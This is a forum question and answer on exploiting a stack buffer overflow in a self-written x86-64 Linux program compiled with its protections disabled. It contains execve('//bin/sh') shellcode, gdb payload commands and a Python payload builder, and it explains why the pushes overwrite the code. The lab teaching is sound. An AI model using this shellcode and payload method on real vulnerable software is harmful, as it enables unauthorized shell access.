assembly x86-64 buffer-overflow exploit shellcode

How can I exploit a buffer overflow on x86-64 Linux?

I made a simple vulnerable program greet.c:

#include <stdio.h>
#include <string.h>
int main (int argc, char **argv) {
    char buf[32];
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}

I compiled the program with as many protections disabled as I know of (DEP/NX, Stack Canaries, RELRO, PIE) using GCC:

gcc -march=x86-64 -O2 -pipe -o greet greet.c -O0 -g -z execstack -fno-stack-protector -Wl,-z,norelro -no-pie -U_FORTIFY_SOURCE

I also temporarily disabled ASLR (and verified with cat that it is disabled) and relaxed the ptrace restriction:

sudo sh -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
sudo sh -c 'echo 0 > /proc/sys/kernel/yama/ptrace_scope'

Next I tried the exploitation in GDB. First I located the buffer, whose address I want to use as the new return address:

(gdb) disas main
   ...
   0x000000000040117e <+40>:    call   0x401050 <strcpy@plt>
   0x0000000000401183 <+45>:    lea    rax,[rbp-0x20]
   0x0000000000401187 <+49>:    mov    rdi,rax
   0x000000000040118a <+52>:    call   0x401060 <puts@plt>
   ...
(gdb) b *0x0000000000401187
(gdb) r $(python3 -c "print('A'*32)")
(gdb) x/20x $rsp
...
0x7fffffffdda0: 0xffffdef8      0x00007fff      0x00000000      0x00000002
0x7fffffffddb0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffddc0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffddd0: 0xffffde00      0x00007fff      0xf7c2a338      0x00007fff
...
(gdb) d 1

So the return address should be 0x7fffffffddb0 (the start of buf). Next I found the offset, i.e. how many bytes my exploit has to have:

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x41'*40+b'\x42'*6)")
Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

On x86-64, user-space addresses here use only the low 6 bytes (the top two bytes are zero), so this was a success: the payload is 46 bytes (40 bytes for the exploit + 6 bytes for the return address). The last step is the shellcode. I wrote my own:

; Platform: Linux (amd64/x64/x86-64)
; Syscalls:
;   1. execve("//bin/sh", NULL, NULL)
; Shellcode: 23 bytes
;   \x31\xd2\x52\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x31\xf6
;   \x54\x5f\x6a\x3b\x58\x0f\x05
global _start
section .text
_start:
    xor     edx,edx                    ; execve.envp = NULL
    push    rdx
    mov     rax,0x68732f6e69622f2f     ; "//bin/sh"
    push    rax
    xor     esi,esi                    ; execve.argv = NULL
    push    rsp
    pop     rdi                        ; execve.pathname = "//bin/sh"
    push    0x3b
    pop     rax                        ; execve
    syscall                            ; execve("//bin/sh", NULL, NULL)

Then I assembled it and tested it:

nasm -f elf64 -o linux-x64.o linux-x64.asm
ld -o linux-x64 linux-x64.o
./linux-x64

Aaaand I got the shell. Great! Next I extracted the shellcode bytes:

objcopy -O binary -j .text linux-x64.o linux-x64.bin
hd -v -e '1/1 "%02x"' linux-x64.bin | sed -e 's/../&\\x/g' -e 's/^/\\x/' -e 's/\\x$/\n/'

There are also no null bytes, so all should be good. Lastly I padded this shellcode with NOPs to fill all 40 bytes and appended the return address in little-endian format:

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*17+b'\x31\xd2\x52\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x31\xf6\x54\x5f\x6a\x3b\x58\x0f\x05'+b'\xb0\xdd\xff\xff\xff\x7f')")
Program received signal SIGILL, Illegal instruction.
0x00007fffffffddc1 in ?? ()

But I got SIGILL, so I tried one more time with a different shellcode that I found on shell-storm (https://shell-storm.org/shellcode/files/shellcode-905.html):

(gdb) r $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*11+b'\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05'+b'\xb0\xdd\xff\xff\xff\x7f')")
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffddbf in ?? ()

But still no luck. Segfault this time.

What am I doing wrong?

GCC version just in case:

Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-linux-gnu/14/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none:amdgcn-amdhsa
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 14.2.0-19ubuntu2' --with-bugurl=file:///usr/share/doc/gcc-14/README.Bugs --enable-languages=c,ada,c++,go,d,fortran,objc,obj-c++,m2,rust --prefix=/usr --with-gcc-major-version-only --program-suffix=-14 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/libexec --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --enable-bootstrap --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-libstdcxx-backtrace --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --enable-default-pie --with-system-zlib --enable-libphobos-checking=release --with-target-system-zlib=auto --enable-objc-gc=auto --enable-multiarch --disable-werror --enable-cet --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none=/build/gcc-14-C86vgL/gcc-14-14.2.0/debian/tmp-nvptx/usr,amdgcn-amdhsa=/build/gcc-14-C86vgL/gcc-14-14.2.0/debian/tmp-gcn/usr --enable-offload-defaulted --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu --with-build-config=bootstrap-lto-lean --enable-link-serialization=2
Thread model: posix
Supported LTO compression algorithms: zlib zstd
gcc version 14.2.0 (Ubuntu 14.2.0-19ubuntu2)

Solution

Let's look at the layout of the stack at the moment your shellcode gets control. One character = one byte.

nops.............shellcode..............retaddr.xxxxxxxx
^                                               ^                                     
rip                                             rsp

We've just executed ret, which popped the return address off the stack, incrementing rsp to point just past it. The first push your shellcode executes overwrites the return address. That's fine, you don't need it anymore. But the second push overwrites the last 8 bytes of your code, and successive pushes will overwrite even more of it. That's why you get an illegal instruction fault: your code was overwritten by your stack data before being executed.
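
To make the overlap concrete, here is a minimal sketch in Python. It models only rsp and payload offsets, not a real process. It assumes the layout from the question (return address slot at offset 40, so rsp sits at offset 48 right after ret) and that every push writes 8 bytes. The function name first_clobber and the instruction table are my own illustration, built from the listing in the question.

```python
# Model of the question's shellcode: (mnemonic, encoded length, change to rsp).
# Lengths come from the 23-byte encoding given in the question.
INSTRUCTIONS = [
    ("xor edx,edx", 2, 0),
    ("push rdx", 1, -8),
    ("mov rax,imm64", 10, 0),
    ("push rax", 1, -8),
    ("xor esi,esi", 2, 0),
    ("push rsp", 1, -8),
    ("pop rdi", 1, +8),
    ("push 0x3b", 2, -8),
    ("pop rax", 1, +8),
    ("syscall", 2, 0),
]


def first_clobber(code_start, rsp_after_ret):
    """Return (mnemonic, payload offsets) for the first push that overwrites
    shellcode bytes which have not been executed yet, or None if no push does.

    All values are offsets from the start of the payload, not real addresses.
    """
    code_end = code_start + sum(length for _, length, _ in INSTRUCTIONS)
    rsp = rsp_after_ret
    pc = code_start
    for name, length, delta in INSTRUCTIONS:
        pc += length  # pc now points at the next instruction to execute
        rsp += delta
        if delta < 0:
            # A push stores 8 bytes at the new rsp.
            written = range(rsp, rsp + 8)
            hit = [off for off in written if pc <= off < code_end]
            if hit:
                return name, hit
    return None


if __name__ == "__main__":
    # Layout from the question: 17 NOPs, then the shellcode, then the return address.
    print("NOPs first:     ", first_clobber(code_start=17, rsp_after_ret=48))
    # Alternative layout: shellcode at the very start of the buffer.
    print("shellcode first:", first_clobber(code_start=0, rsp_after_ret=48))
```

With the shellcode at offset 17, the model reports push rax overwriting offsets 32 to 39, which are the last 8 bytes of the code. With the shellcode at offset 0, no push reaches code that is still to be executed.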

You could buy yourself a little bit of stack space by moving the shellcode to the beginning of the buffer data, with the 17 bytes of padding after it rather than before. I think for the code as it stands, that would be just enough space to avoid overwriting your code. If not, then another solution is simply to decrement the stack pointer so that it points well below your code, and is out of the way: do something like sub rsp, 0x78 before any other stack operations. (Immediates up to 0x7f can be encoded as a single byte, without including any zero bytes in the instruction; but maintaining at least 8-byte alignment is a good idea.)
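
Here is a sketch of how either fix could be assembled into a payload. It assumes the 40-byte offset from the question and uses the question's 0x7fffffffddb0 purely as a placeholder for the buffer address. Without a NOP sled in front, the return address has to hit the first byte of the shellcode exactly, and the buffer can move when the argument length changes, so re-check the address in gdb with the final payload. The names build_payload and payload.py are hypothetical.

```python
import struct
import sys

# The 23-byte shellcode from the question.
SHELLCODE = bytes.fromhex("31d25248b82f2f62696e2f73685031f6545f6a3b580f05")
# Encoding of "sub rsp, 0x78" (REX.W 83 /5 ib); contains no zero bytes.
SUB_RSP_0X78 = bytes.fromhex("4883ec78")
# Distance from the start of buf to the saved return address (from the question).
OFFSET_TO_RET = 40
# ASSUMPTION: placeholder taken from the question; verify it for your own run.
BUF_ADDR = 0x7FFFFFFFDDB0


def build_payload(code, buf_addr, pad=b"A"):
    """Place code at the start of the buffer, pad up to the return address,
    then append the low 6 bytes of buf_addr in little-endian order."""
    if len(code) > OFFSET_TO_RET:
        raise ValueError("code does not fit before the return address")
    body = code + pad * (OFFSET_TO_RET - len(code))
    # The two high bytes are zero and cannot be passed through argv/strcpy,
    # so they are omitted, as in the question's payload.
    ret = struct.pack("<Q", buf_addr)[:6]
    payload = body + ret
    if b"\x00" in payload:
        raise ValueError("payload contains a zero byte; strcpy would stop there")
    return payload


if __name__ == "__main__":
    # Fix 1: shellcode first, padding after it.
    # Fix 2 (alternative): build_payload(SUB_RSP_0X78 + SHELLCODE, BUF_ADDR)
    sys.stdout.buffer.write(build_payload(SHELLCODE, BUF_ADDR))
```

If this is saved as payload.py, it can be used from gdb as r $(python3 payload.py). The padding bytes after the shellcode are never executed when execve succeeds, so their value does not matter as long as it is not zero.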

I'd like to offer some unsolicited advice on your development process. When you found that your shellcode crashed with SIGILL, it seems that your immediate response was to change stuff: use a completely different third-party shellcode, change the buffer size, etc. IMHO, the better response is to keep everything exactly the same, and find out why it fails. What was the state of the program that caused SIGILL? How did it get to that state? Determine what information you need, and what tools can help you get it. Particularly for security research, this is the kind of instinct you want to cultivate.

What I did here was to simply single-step the exploit code in gdb. You can use display/i $pc to see each instruction disassembled before it's executed, and si to step one instruction at a time. I also used x/30i buf to disassemble the contents of the buffer. I was able to see that the program correctly jumped to the start of the buffer, and that its contents were correct at that point. By continuing to single-step the program and dumping the buffer periodically, I could see exactly when its contents became wrong: immediately after a push instruction. Then looking at the value of the stack pointer (p/x $rsp) and comparing with the address of the buffer, it was clear what was going on.

So this is the kind of process you want to get used to doing for yourself. It's not based on any kind of brilliant insight; just some basic familiarity with essential tools, careful attention to detail, and enough patience to stick with a problem until you truly understand its root cause.